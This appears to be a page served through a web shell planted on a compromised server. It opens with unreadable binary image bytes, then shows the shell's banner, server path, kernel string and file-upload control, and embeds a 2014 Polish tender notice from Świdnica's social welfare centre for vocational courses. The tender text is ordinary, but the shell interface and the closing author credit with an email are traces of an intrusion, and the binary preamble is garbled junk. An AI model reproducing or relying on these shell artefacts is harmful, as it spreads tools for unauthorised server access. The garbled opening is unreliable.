JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140721/243264-N-2014.html

<p class="kh_header"><b>Świdnica: Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursów zawodowych dla uczestników projektu systemowego Uwierz we własne siły</b><br>
<b>Numer ogłoszenia: 243264 - 2014; data zamieszczenia: 21.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Wałbrzyska 15, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8537139, faks 074 8537139.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.swidnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursów zawodowych dla uczestników projektu systemowego Uwierz we własne siły.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursów zawodowych dla uczestników projektu systemowego Uwierz we własne siły, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie: 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie: 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej na lata 2007-2013. 1.1. INSTRUMENT AKTYWIZACJI EDUKACYJNEJ -  zaplanowano następujące kursy zawodowe:  
A. Kurs zawodowy - Opiekun osoby starszej i/lub niepełnosprawnej z nauką języka niemieckiego - 8 osób. Zajęcia w ramach kursu - min.150 godz.  (w tym: minimum 40 godz. zajęć praktycznych w stosownej placówce tj. Dom Pomocy Społecznej, Ośrodek Wsparcia Dziennego, minimum 40 godz. dydaktycznych języka niemieckiego z uwzględnieniem języka branżowego i minimum 70 godz. zajęć teoretycznych). 
Wykonawca zapewni uczestnikom językowe skrypty branżowe, zawierające rozmówki i słówka, których znajomość jest niezbędna w pracy opiekuna. Wykonawca zapewni w miarę potrzeby odzież ochronną (fartuch, rękawiczki) oraz badania lekarskie i sanitarno - epidemiologiczne.
Zleceniodwość dołączenia uczestników Projektu do istniejących kursów zewnętrznych, prowadzonych przez Wykonawcę
B. Kurs zawodowy - Magazynier z obsługą wózka widłowego wraz z butlą gazową - 4 osoby. Zajęcia w ramach kursu - min. 115 godz. (w tym: minimum 75 godz. zajęć praktycznych i minimum 40 godz. zajęć teoretycznych).
Każdy z uczestników przez okres nauki podstaw magazynowania i obsługi komputerowych programów magazynowych musi mieć zapewniony stały indywidualny dostęp do komputera lub laptopa. 
Zleceniodawca dopuszcza możliwość dołączenia uczestników Projektu do istniejących kursów zewnętrznych, prowadzonych przez Wykonawcę. 
C. Kurs zawodowy - Sprzedawca z obsługą kasy fiskalnej i minimum sanitarnym - nowoczesny sprzedawca - 6 osób. Zajęcia w ramach kursu - min. 107  godz. (w tym: minimum 35 godz. praktycznych i minimum 72 godz. zajęć teoretycznych). Każdy z uczestników przez cały okres szkolenia musi mieć zapewniony stały indywidualny dostęp do komputera (laptopa) i kasy fiskalnej w trakcie trwania zajęć praktycznych. 
Zleceniodawca dopuszcza możliwość dołączenia uczestników Projektu do istniejących kursów zewnętrznych, prowadzonych przez Wykonawcę

1.2. Usługa dla uczestników projektu będzie świadczona poza siedzibą Ośrodka, w lokalu zapewnionym przez Wykonawcę,  na terenie miasta Świdnicy w terminie: od sierpnia 2014 roku do listopada 2014 roku. 
1.3. W przypadku zajęć praktycznych Zamawiający dopuszcza odbywanie praktyk poza terenem miasta Świdnicy tj. w powiecie Świdnickim lub pobliskich powiatach.  Wykonawca wówczas jest zobowiązany zapewnić dojazd uczestników Projektu z miasta Świdnicy do miejsca odbywania praktyk i z powrotem. Czas dojazdu nie będzie wliczany w godziny zajęć praktycznych. Koszt dojazdu należy uwzględnić w ogólnej cenie kursu.
1.4 Zamawiający zastrzega, iż w przypadku pisemnej rezygnacji z Kursu przez Uczestnika projektu przed rozpoczęciem Kursu wynagrodzenie ulegnie obniżeniu o kwotę przypadającą na dany Kurs, natomiast w przypadku rezygnacji Uczestnika w trakcie realizacji Kursu wynagrodzenie zostanie wypłacone proporcjonalnie do części zrealizowanego Kursu. 
1.5.  Czas trwania kursu średnio 3 miesiące. 
- zajęcia odbywać się będą co najmniej 2 razy w tygodniu w dni powszednie tj. od poniedziałku do piątku w godzinach między 8.00 - 15.00 z zachowaniem przerw międzylekcyjnych.


1.6  Ponadto Wykonawca zobowiązuje się:
1.6.1. Dostarczyć ramowy program realizacji kursów uwzględniający:
- program nauczania,
- proponowaną liczbę godzin na poszczególne bloki tematyczne,
-  liczbę godzin praktycznych i teoretycznych.
1.6.2. Skierować i sfinansować badania lekarza medycyny pracy dla 18 uczestników Projektu co będzie potwierdzone zaświadczeniami lekarskimi.
1.6.3. Przygotować i oznaczyć dokumentację związaną z przeprowadzonymi cyklami  kursów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, sporządzać listy obecności na zajęciach, dzienniki zajęć edukacyjnych zawierający wymiar godzin i tematy zajęć edukacyjnych i praktycznych, rejestr wydanych zaświadczeń lub innych wydanych dokumentów potwierdzających ukończenie kursów i uzyskanie kwalifikacji zawodowych (odbiór dokumentów winien być potwierdzony w rejestrze przez każdego uczestnika własnoręcznym podpisem)
1.6.4. Informować Zamawiającego o wszelkich nieobecnościach uczestników kursów do 2 dni po zaistnieniu tego faktu. Informację o nieobecności uczestników kursów zawodowych Wykonawca prześle Zamawiającemu e-mailem, faxem lub telefonicznie do Kierownika projektu.
1.6.5. Zabezpieczyć każdemu z uczestników kursów warunków pracy zgodnie z przepisami bezpieczeństwa i higieny pracy w trakcie trwania kursów jak i materiałów szkoleniowych i sprzętów niezbędnych do realizacji zajęć praktycznych. Wykonawca musi dla każdego uczestnika szkolenia zagwarantować miejsce siedzące (stolik/ławkę bądź krzesło z przystawką) umożliwiające swobodne sporządzanie notatek.
1.6.6. Przekazać uczestnikom oraz Zamawiającemu przed rozpoczęciem kursów harmonogramu zajęć a w przypadku nanoszenia w nim zmian informować pisemnie Zamawiającego o tych zmianach i dostarczać aktualny harmonogram,
1.6.7y harmonogram,
1.6.7. Dostarczyć Zamawiającemu w terminie do: 5-go dnia każdego miesiąca oryginału listy obecności za poprzedni miesiąc (listy muszą być czytelne, kompletne i zatwierdzone przez osobę upoważnioną ze strony Wykonawcy, natomiast obecność uczestnika musi być każdorazowo potwierdzona własnoręcznym podpisem przez uczestnika kursu)
1.6.8. Przeprowadzić ewaluacje i monitoring kursów.
1.6.9. Przekazać dokumentację dot. kursów do siedziby Zamawiającego w terminie do 7 dni po zakończeniu kursów.
1.6.10. Wydać uczestnikowi Projektu zaświadczenia potwierdzającego ukończenie kursu zawodowego.
1.6.11. Dla wszystkich uczestników kursów wykonawca zapewni nieodpłatnie przez okres ich trwania obsługę cateringową w formie serwisu kawowego (kawa, herbata, ciastka różne, cukier, mleko lub śmietanka, cytryna itp.). W przypadku zajęć teoretycznych dodatkowo catering w formie gorącego posiłku (mięsnego, jarskiego) każdego dnia zajęć teoretycznych trwających minimum 6 godzin lekcyjnych. Koszty cateringu należy uwzględnić w ogólnej cenie kursu.
1.6.12. Przedstawienia na pisemne wezwania Zamawiającego wszelkich informacji i wyjaśnień związanych z realizacją cyklu kursów zawodowych w terminie określonym w wezwaniu.
1.6.13. Przestrzegania zasad wynikających z przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz.U.2002 r. Nr 101 poz. 926 z późniejszymi zmianami).
1.6.14. Wykonawca zobowiązuje się po zrealizowanej umowie do przedstawienia w terminie 7 dni raportu końcowego.
1.6.15. Zamawiający zastrzega sobie możliwość prowadzenia bieżącego nadzoru nad procesem szkolenia beneficjentów - na każdym jego etapie.
1.6.16. Zamawiający zapłaci Wykonawcy tylko za osoby faktycznie skierowane na kurs zgodnie z odbytą liczbą godzin.
1.6.17. Pomieszczenia, w których odbywać się będą zajęcia z uczestnikami muszą być oznaczone logotypami POKL, EFS oraz informacją o realizowanym Projekcie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie może się ubiegać Wykonawca, który spełnia warunki dotyczące:
7.1.	Posiadania uprawnień do wykonania zamówienia zgodnie z ustawą  z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy - tekst jednolity: Dz. U. z 2013 r. poz. 674 z późn. zm. tj. posiada wpis do rejestru instytucji szkoleniowych (Posiadanie przez instytucję szkoleniową wpisu do rejestru instytucji szkoleniowych Zamawiający sprawdzi w centralnym rejestrze instytucji szkoleniowych, dostępnym na stronie internetowej www.ris.praca.gov.pl)
7.2.	Posiadania doświadczenia zawodowego w przeprowadzeniu szkoleń zawodowych w okresie ostatnich 3 lat lub jeżeli okres prowadzenia działalności jest krótszy - z całego okresu. 
7.3.	Dysponowania osobami zdolnymi do wykonania zamówienia; 1 osoba na kurs zawodowy: Magazynier z obsługą wózka widłowego wraz z butlą gazową i 1 osoba na kurs zawodowy Opiekun osoby starszej i/lub niepełnosprawnej z nauką języka niemieckiego 1 osoba na kurs zawodowy Sprzedawca z obsługą kasy fiskalnej i minimum sanitarnym - nowoczesny sprzedawca (legitymującymi się dyplomem ukończenia studiów wyższych z minimum 3 letnim doświadczeniem w zakresie prowadzenia kursów zawodowych oraz odpowiednimi uprawnieniami w przypadku kursów zawodowych (dyplomy, certyfikaty).
7.4. Nie podlegania wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Pzp. 
Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt.8 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił. 
Zamawiający wezwie Wykonawców, którzy nie złożyli dokumentów potwierdzających spełnienie w/w warunków lub, którzy nie złożyli pełnomocnictw, albo którzy złożyli dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa do ich złożenia w wyznaczonym terminie chyba, że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. 
Złożone na wezwanie Zamawiającego oświadczenia lub dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane usługi wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
Niespełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>8.1.W celu wykazania spełnienia warunków udziału w postępowaniu, oferta musi zawierać następujące dokumenty:
8.1.1.	Oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust.1 ustawy Pzp - wg załącznika nr 2 do SIWZ
8.1.2.	Wykaz wykonanych usług potwierdzający posiadanie doświadczenia zawodowego w przeprowadzeniu szkoleń zawodowych w okresie ostatnich 3 lat lub jeżeli okres prowadzenia działalności jest krótszy - z całego okresu oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie lub są wykonywane należycie (wg załącznika nr 5 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Usługa dla uczestników projektu będzie świadczona poza siedzibą Ośrodka, w lokalu zapewnionym przez Wykonawcę,  na terenie miasta Świdnicy w terminie: od sierpnia 2014 roku do listopada 2014 roku.  W przypadku zajęć praktycznych Zamawiający dopuszcza odbywanie praktyk poza terenem miasta Świdnicy tj. w powiecie Świdnickim lub pobliskich powiatach.  Wykonawca wówczas jest zobowiązany zapewnić dojazd uczestników Projektu z miasta Świdnicy do miejsca odbywania praktyk i z powrotem. Czas dojazdu nie będzie wliczany w godziny zajęć praktycznych. Koszt dojazdu należy uwzględnić w ogólnej cenie kursu. Zabezpieczyć każdemu z uczestników kursów warunków pracy zgodnie z przepisami bezpieczeństwa i higieny pracy w trakcie trwania kursów jak i materiałów szkoleniowych i sprzętów niezbędnych do realizacji zajęć praktycznych. Wykonawca musi dla każdego uczestnika szkolenia zagwarantować miejsce siedzące (stolik/ławkę bądź krzesło z przystawką) umożliwiające swobodne sporządzanie notatek</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>7.3.	Dysponowania osobami zdolnymi do wykonania zamówienia; 1 osoba na kurs zawodowy: Magazynier z obsługą wózka widłowego wraz z butlą gazową i 1 osoba na kurs zawodowy Opiekun osoby starszej i/lub niepełnosprawnej z nauką języka niemieckiego 1 osoba na kurs zawodowy Sprzedawca z obsługą kasy fiskalnej i minimum sanitarnym - nowoczesny sprzedawca (legitymującymi się dyplomem ukończenia studiów wyższych z minimum 3 letnim doświadczeniem w zakresie prowadzenia kursów zawodowych oraz odpowiednimi uprawnieniami w przypadku kursów zawodowych (dyplomy, certyfikaty)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt.8 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mops.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Świdnicy, ul. Westerplatte 47, 58-100 Świdnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2014 godzina 15:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Świdnicy, ul. Wałbrzyska 15, 58-100 Świdnica, pok. 203, 2 piętro - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie: 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie: 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com